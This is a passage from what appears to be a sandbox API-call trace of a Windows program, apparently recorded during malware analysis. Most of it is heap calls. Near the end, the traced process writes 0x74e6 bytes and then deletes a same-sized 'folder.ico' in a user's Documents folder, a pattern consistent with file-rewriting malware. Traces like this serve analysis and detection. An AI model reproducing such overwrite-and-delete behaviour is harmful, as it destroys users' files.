hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0175.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0175.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0175.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0175.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0175.225] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0175.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0175.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0175.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0175.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0175.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0175.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0175.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0175.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0175.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0175.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0175.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0175.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0175.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0175.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0175.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0175.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0175.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0175.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0175.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0175.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0175.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0175.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0175.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0175.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0175.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0175.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0175.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0175.228] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0175.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0175.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0175.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0175.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0175.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0175.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0175.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0175.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0175.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0175.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0175.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0175.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0175.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0175.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0175.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0175.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0175.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0175.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0175.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0175.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0175.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0175.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0175.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0175.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0175.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0175.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0175.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0175.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0175.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0175.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0175.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0175.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0175.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0175.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0175.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0175.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0175.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0175.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0175.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0175.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0175.230] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0175.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0175.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0175.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd348 [0175.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd348, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0175.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0175.231] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0175.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0175.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0175.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0175.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0175.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0175.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0175.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0175.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0175.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0175.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0175.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0175.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0175.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0175.232] WriteFile (in: hFile=0x120, lpBuffer=0xa5f008*, nNumberOfBytesToWrite=0x74e6, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesWritten=0x87eae0*=0x74e6, lpOverlapped=0x0) returned 1 [0175.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0175.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0175.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0175.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0175.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0175.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0175.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0175.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0175.233] FreeLibrary (hLibModule=0x75990000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0175.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0175.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0175.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0175.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0175.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0175.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0175.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0175.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0175.234] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.234] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.234] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.234] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.234] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0175.234] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.234] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.234] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0175.236] FreeLibrary (hLibModule=0x75990000) returned 1 [0175.236] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.236] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.236] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.236] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", lpFilePart=0x0) returned 0x45 [0175.238] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0xdcddca0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="folder.ico", cAlternateFileName="")) returned 0x90af58 [0175.238] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico")) returned 1 [0175.242] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0xdcddca0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="folder.ico", cAlternateFileName="")) returned 0 [0175.242] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0175.242] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.243] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.243] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0175.243] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0175.243] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.243] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="co", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.243] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ico", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.247] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ico", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0175.247] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0175.247] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0175.247] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0175.247] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 